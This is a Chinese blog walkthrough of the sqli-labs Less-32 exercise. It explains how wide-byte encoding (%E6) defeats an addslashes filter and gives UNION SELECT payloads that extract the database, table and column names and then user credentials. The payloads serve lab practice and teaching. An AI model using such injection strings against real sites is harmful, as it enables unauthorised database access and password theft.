码迷,mamicode.com
首页 > 其他好文 > 详细

Less(32)GET - Bypass custom filter adding slashes to dangerous chars

时间:2020-03-03 19:14:12      阅读:91      评论:0      收藏:0      [点我收藏+]

标签:技术   查看   hack   csdn   char   tail   add   sdn   使用   

1.查看一下php文件:

  技术图片

 

   

  check_addslashes()会在单引号前加一个\ 例如:I‘m hacker 传入addslashes(),得到:I\‘m hacker

  本题想以此阻止sql注入语句闭合,但是可以使用宽字节绕过:

  原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6‘ 这样的构造时,‘ 前面加的 \ 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 \ 的作用,库。

2.爆破

  (1)爆库:?id=-1%E6‘ union select 1,2,database() --+

    技术图片

  (2)爆表:?id=-1%E6‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

    技术图片

 

     需要对战ASCII码表,将security换成其对应的16进制

  (3)爆列名:?id=-1%E6‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

    技术图片

  (4)爆值:?id=-1%E6‘ union select 1,group_concat(username,0x7e,password),3 from security.users --+

    技术图片

 

 


原文链接:https://blog.csdn.net/qq_41420747/article/details/81836327

Less(32)GET - Bypass custom filter adding slashes to dangerous chars

标签:技术   查看   hack   csdn   char   tail   add   sdn   使用   

原文地址:https://www.cnblogs.com/meng-yu37/p/12403875.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!